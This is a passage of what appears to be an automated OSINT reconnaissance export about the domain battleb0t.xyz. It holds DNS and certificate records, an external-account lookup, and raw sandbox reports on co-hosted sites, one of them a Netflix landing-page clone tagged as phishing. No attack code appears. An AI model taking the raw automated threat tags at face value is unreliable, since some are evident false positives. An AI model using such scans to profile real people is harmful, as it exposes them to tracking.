28px">" (Indicator: "Add-Content"; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6236_1468670677\\shopping.js]- 
[targetUID: 00000000-00006236]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00001308]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir6236_1265273683\\Ruleset Data]- [targetUID: 00000000-0000623 | 185.199.108.153 |
| 2023-05-12 02:44:11 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 2 | 1 | 1 | 0 | None | github.com | battleb0t.xyz |
| 2023-05-12 02:44:05 | SSL Certificate Expiring | Yes | CertSpotter | 0 | 0 | 1 | 0 | None | 2023-05-26 01:39:24 | battleb0t.xyz |
| 2023-05-12 03:09:26 | Co-Hosted Site | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | cdnjs.cloudflare.com | 188.114.96.1 |
| 2023-05-12 03:09:28 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | 87.248.157.102 |
| 2023-05-12 02:50:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nuke.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:37:68:7b:1f:26:29:cd:a4:cc:95:52:df:e2:0a:12:6f:13
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 13 15:23:51 2023 GMT
Not After : May 14 15:23:50 2023 GMT
Subject: CN=nuke.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d9:29:5b:18:4c:1d:e8:59:eb:db:25:91:54:31:
ed:38:23:ab:0a:88:57:5c:ef:0c:7e:ca:ca:6c:71:
0b:02:fd:19:3d:6a:e8:97:28:77:25:12:e6:41:af:
0c:74:de:eb:50:90:97:94:e1:fd:e0:db:78:3a:0a:
5f:ae:54:a8:1f:8e:40:46:da:de:c8:9e:fa:c8:e7:
39:8e:1b:9f:5e:60:ec:47:c4:47:f9:79:27:17:65:
24:54:e3:e9:87:77:9b:2d:fc:59:b6:69:6a:35:59:
71:49:6c:3f:68:b3:6f:f3:47:8d:99:d8:26:4a:34:
e5:bd:98:64:13:9c:bc:2e:32:d9:f1:82:53:39:a9:
0e:5a:3e:f4:44:ad:26:19:df:02:ae:0a:8a:ee:fc:
9b:3e:7d:da:ca:fc:e7:ee:68:4f:c5:8c:ef:dc:74:
06:e9:7a:47:71:5f:53:c7:6d:09:e9:1f:2a:81:e3:
aa:4a:4a:ad:ae:9d:25:b9:f8:c2:d3:14:56:b4:75:
91:e9:be:73:0e:b4:7d:4d:da:64:95:77:6d:43:79:
73:49:a5:8a:21:01:8b:43:f7:7e:6b:34:db:43:cb:
18:86:96:0e:e7:1a:02:5a:4f:df:42:dd:88:c3:61:
4d:6b:c6:c6:bf:25:5b:76:f4:0e:86:dd:ad:d2:26:
a8:0b:2a:9a:7b:42:50:c1:2c:92:f7:92:ae:7c:b1:
d3:11:4f:23:ac:54:f9:9e:aa:91:2b:7c:ed:1c:c1:
46:1b:9b:3c:a0:2a:b1:e3:e2:b9:d0:7f:06:57:c9:
1e:63:2a:89:4d:e0:fc:34:28:ec:5f:72:15:f2:01:
80:22:e3:d2:bf:66:7b:78:f3:2a:37:36:d0:18:e7:
eb:62:58:1a:53:3f:4a:aa:c6:06:93:11:2e:9b:de:
b2:20:c5:30:35:f7:4b:de:99:68:8b:4d:f1:cf:5f:
e0:29:92:a1:d4:25:53:f6:6b:8d:eb:c8:2f:a1:48:
f6:93:3d:2d:29:1c:93:8a:83:6e:a8:d5:40:07:99:
d9:b4:ed:f4:2d:5b:2c:94:69:23:83:3f:eb:1f:20:
45:ea:f5:f6:5a:22:b5:7a:ea:e6:92:ef:69:3a:86:
e9:7d:cc:89:f5:72:d8:75:21:3a:fd:e8:3a:fd:dd:
16:43:3a:20:cf:8c:1c:3f:54:62:be:57:b4:91:f9:
1f:7b:59:bb:69:98:ad:21:46:6b:14:0b:f3:32:e9:
f3:42:4c:fe:3e:ea:f8:50:4d:7c:e3:49:32:31:e8:
73:54:2a:f5:e6:ac:fb:17:66:a1:41:7a:05:04:c9:
53:ab:bd:62:a2:65:3e:e4:d9:bf:f3:5f:60:e6:ba:
3c:1f:a9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D9:CF:28:31:E6:B0:52:A6:B3:E5:82:F1:AF:FD:4B:16:99:CF:87:98
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nuke.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
9d:ff:c4:18:06:c7:30:d4:36:0f:0e:18:02:e1:f1:df:09:d5:
21:48:af:f9:5b:c3:31:1b:5f:2b:b6:70:3d:80:2b:58:d6:6f:
b5:cd:ce:70:10:56:ed:d2:2c:18:4d:d8:55:56:01:67:34:4f:
bc:a8:06:13:c7:63:73:41:9d:bd:7a:2d:d7:ed:6a:95:df:86:
a0:fd:bf:15:00:37:ee:c9:32:cd:29:05:23:5a:30:c7:ce:39:
29:07:6d:b0:2b:6a:1c:81:8f:29:05:30:c4:40:2c:ba:5f:67:
f5:56:a5:86:93:08:a2:16:e7:a9:15:01:13:84:23:08:70:b8:
b0:8e:c4:e6:9c:43:cf:99:85:ea:2e:4c:6c:a4:51:b4:75:a3:
cf:1f:af:40:ab:43:86:65:fb:ba:43:42:24:c7:fd:a0:13:49:
bf:fb:a3:fe:ef:4b:38:f1:34:bd:37:28:78:ae:eb:fe:f8:2c:
4d:b8:bd:50:64:c1:2a:97:b9:ac:34:8d:83:6a:c1:4b:6d:6a:
3a:8c:69:86:1e:d9:d4:69:98:23:cc:ff:1b:aa:4f:58:58:dd:
f4:2d:3e:92:9e:ec:9c:7f:4a:ba:35:54:c6:db:d8:38:08:1a:
75:fe:73:ca:92:d8:db:5e:94:c8:9a:15:84:e4:03:5b:a9:4b:
3c:ac:3c:70
|
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Tanuki.pl (Category: hobby)
https://tanuki.pl/profil/login | login |
| 2023-05-12 02:50:28 | Raw Data from RIRs | No | GLEIF | 0 | 0 | 3 | 0 | None | [{u'attributes': {u'highlighting': u'<b>C</b>/O <b>CENTRALNIC</b> <b>LTD</b>', u'value': u'C/O CENTRALNIC LTD'}, u'type': u'autocompletions'}] | (c) CentralNic Ltd |
| 2023-05-12 02:45:06 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 2606:50c0:8003::153 |
| 2023-05-12 02:46:38 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://stellarium.org/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_aec_ConnHashTable<2796>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_aec_IESQMMUTEX_0_331"\n "IsoScope_aec_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2796"\n "IsoScope_aec_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_aec_IE_EarlyTabStart_0xee8_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2796"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "142.250.189.168:443"\n 
"172.67.71.29:443"\n "142.250.189.238:443"\n "142.251.2.155:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"stellarium.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"stellarium.org"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-154', u'name': u'Found suspicious keywords in script (string)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed keyword:"ActiveXObject" [Source: analytics_1_.js]\n Observed keyword:"ActiveXObject" [Source: jq-ui-flplayer-sw-aggregated_1_.js]\n Observed keyword:".Run" [Source: 00000000-00002916.00000000.67483.02150000.00000002.mdmp\n 00000000-00002916.00000000.67527.02150000.00000002.mdmp]'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"transportUrl:b,context:c},J(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+je.ca+"&cx=c";Go()&&(f+="&sign="+je.Sd);var g=se||ue?Fo(b,f):void 0;g||(g=rl("https://","http://",je.jd+f));di().destination[a]={state:1,context:c};Hb(g)}};function Ho(){if(Zh()){return!0}return!1};var Ko=new 
RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),Lo={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},Mo={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "thumb-5_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 100x100 segment length 16 baseline precision 8 40x40 components 3"- [targetUID: N/A]\n "~DFFE60A6B95FE0E2E6.TMP" has type "data"- Location: [%TEMP%\\~DFFE60A6B95FE0E2E6.TMP]- [targetUID: 00000000-00002796]\n "slide-1_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 baseline precision 8 600x250 components 3"- [targetUID: N/A]\n "jq-ui-flplayer-sw-aggregated_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "dl-macosx_1_.png" has type "PNG image data 60 x 40 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "XCL1KF20.txt" has type 
"ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XCL1KF20.txt]- [targetUID: 00000000-00003580]\n "js_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text"- [targetUID: N/A]\n "RecoveryStore._9738A693-C3A3-11ED-9D1F-0800272BE4CA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "slide-3_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 baseline precision 8 600x250 components 3"- [targetUID: N/A]\n "42BV46U1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\42BV46U1.txt]- [targetUID: 00000000-00003580]\n "slide-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 baseline precision 8 600x250 components 3"- [targetUID: N/A]\n "7RO40XI5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7RO40XI5.txt]- [targetUID: 00000000-00002796]\n "~DFDA73984BBB04A3BA.TMP" has type "data"- Location: [%TEMP%\\~DFDA73984BBB04A3BA.TMP]- [targetUID: 00000000-00002796]\n "_9738A695-C3A3-11ED-9D1F-0800272BE4CA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "bg-l_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 100x100 segment length 16 baseline precision 8 113x181 components 3"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "dl-windows_1_.png" has type "PNG image data 60 x 40 8-bit/color RGBA non-interlaced"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, 
u'threat_level': 0, u'type': 7, u'description': u'"stellarium.org" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "jquery.org/license"\n Pattern match: "https://stats.g.doubleclick.net/j/collect"\n Pattern match: "https://ampcid.google.com/v1/publisher:getClientId"\n Pattern match: "http://static.flowplayer.org/swf/expressinstall.swf,cachebusting:true},t"\n Pattern match: "https://cct.google/taggy/agent.js"\n Pattern match: "http://www.gnu.org/licenses/"\n Pattern match: "http://jqueryui.com/about"\n Pattern match: "http://docs.jquery.com/UI"\n Pattern match: "http://docs.jquery.com/UI/Effects/"\n Pattern match: "http://docs.jquery.com/UI/Mouse"\n Pattern match: "http://docs.jquery.com/UI/Position"\n Pattern match: "http://docs.jquery.com/UI/Widget"\n Pattern match: "http://jquery.com/"\n Pattern match: "http://jquery.org/license"\n Pattern match: "http://sizzlejs.com/"\n Pattern match: "MUID2D2A9A2C4664691E26D188FA47286894msn.com/1025218105305631099439219419004131020976*"\n Pattern match: ".2.1166814548.1678934302stellarium.org/1088135761420831167827160715879131020976*"\n Pattern match: ".2.1166814548.1678934302stellarium.org/1088135761420831167827160715879131020976*_gidGA1.2.164760106.1678934302stellarium.org/1088231157260831021177160731504131020976*"\n Pattern match: ".2.1166814548.1678934302stellarium.org/1088135761420831167827160715879131020976*_gidGA1.2.164760106.1678934302stellarium.org/1088231157260831021177160731504131020976*_gat_gtag_UA_109850660_11stellarium.org/1088219999910431020976160778379131020976*"\n Pattern match: "https://www.google.com/ads/ga-audiences,a.google,c"\n Pattern match: "https://stats.g.doubleclick.net/j/collect,ca.U,ca"\n Pattern match: 
"https://www.google-analytics.com/analytics.js,k=c.F?pp(R(c,gaFunctionName)):pp();if(pa(k)){var"\n Pattern match: "https://+c"\n Pattern match: "www.google-analytics.com==a.host&&(a.port||b)==b&&D(a.path,/plugins/)?!0:!1},ne=function(a){var"\n Pattern match: "www.google-analytics.com},Ge=function(a){switch(a){default:case"\n Pattern match: "https://tagassistant.google.com/"\n Pattern match: "https://+g | 185.199.111.153 |
| 2023-05-12 02:50:48 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://nickcher.github.io/netflix_landing_clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b0c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_b0c_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2828"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_b0c_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b0c_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_b0c_IE_EarlyTabStart_0xda0_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_b0c_ConnHashTable<2828>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2828"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 
u'"185.199.108.153:443"\n "172.96.160.210:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"i.ibb.co"\n "nickcher.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com." (Indicator: "dir "; File: "netflix_landing_clone_1_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n 
"tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Cab26D3.tmp" has type "data"- Location: [%TEMP%\\Cab26D3.tmp]- [targetUID: 00000000-00003584]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002828]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF64A1F5312060F4AE.TMP" has type "data"- Location: [%TEMP%\\~DF64A1F5312060F4AE.TMP]- [targetUID: 00000000-00002828]\n "~DFC2B27440F7A0B15C.TMP" has type "data"- Location: [%TEMP%\\~DFC2B27440F7A0B15C.TMP]- [targetUID: 00000000-00002828]\n 
"~DF0A3D913D5F45CD6B.TMP" has type "data"- Location: [%TEMP%\\~DF0A3D913D5F45CD6B.TMP]- [targetUID: 00000000-00002828]\n "~DF87F80C8C1C5AD9DE.TMP" has type "data"- Location: [%TEMP%\\~DF87F80C8C1C5AD9DE.TMP]- [targetUID: 00000000-00002828]\n "urlref_httpsnickcher.github.ionetflix_landing_clone" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "RecoveryStore._B6073E9B-EF99-11ED-BFDF-0800272E71EF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_C011B3B6-EF99-11ED-BFDF-0800272E71EF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_B6073E9D-EF99-11ED-BFDF-0800272E71EF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "script_1_.js" has type "ASCII text"- [targetUID: N/A]\n "NUC70NVO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NUC70NVO.txt]- [targetUID: 00000000-00003584]\n "W4NLV9B9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W4NLV9B9.txt]- [targetUID: 00000000-00002828]\n "9UXBXI81.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9UXBXI81.txt]- [targetUID: 00000000-00002828]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003584]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "LO9MJJD0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LO9MJJD0.txt]- [targetUID: 00000000-00003584]\n "6YRDU7V9.txt" has type "ASCII text"- Location: 
[%APPDATA%\\Microsoft\\Windows\\Cookies\\6YRDU7V9.txt]- [targetUID: 00000000-00002828]\n "G0VQDCLZ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\G0VQDCLZ.txt]- [targetUID: 00000000-00002828]\n "GUUOB0ON.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GUUOB0ON.txt]- [targetUID: 00000000-00002828]\n "Cab281E.tmp" has type "data"- Location: [%TEMP%\\Cab281E.tmp]- [targetUID: 00000000-00003584]\n "Cab2833.tmp" has type "data"- Location: [%TEMP%\\Cab2833.tmp]- [targetUID: 00000000-00003584]\n "Cab2E9E.tmp" has type "data"- Location: [%TEMP%\\Cab2E9E.tmp]- [targetUID: 00000000-00003584]\n "Cab2821.tmp" has type "data"- Location: [%TEMP%\\Cab2821.tmp]- [targetUID: 00000000-00003584]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003584]\n "Cab281D.tmp" has type "data"- Location: [%TEMP%\\Cab281D.tmp]- [targetUID: 00000000-00003584]\n "netflix_landing_clone_1_.htm" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://nickcher.github.io/netflix_landing_clone/"\n Pattern match: "https://nickcher.github.io"\n Pattern match: "https://nickcher.github.io/netflix_landing_clone"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Pattern match: 
"mzjdL.VS/oLORCm/~H.c0KNw&FGk~Z2C3[f"\n Pattern match: "www.microsoft.com/pkiops/certs/Microsoft%20Azure%20TLS%20Issuing%20CA%2002%20-%20xsign.crt0-!http://oneocsp.microsoft.com/ocsp05E9R"\n Pattern match: "https://i.ibb.co/r5krrdz/logo.png"\n Pattern match: "https://i.ibb.co/vXqDmnh/background.jpg"\n Pattern match: "SUIDmicrosoft.com/9216418687628831032347268501117031032230MUID09E339F3135660E63EB22AFD12D26110microsoft.com/ | 185.199.108.153 |
| 2023-05-12 02:44:16 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:d7:56:4b:39:cd:63:5b:72:07:1e:ba:15:c9:f7:2c:e7:33
Signature Algorithm: sha256WithRSAEncryption
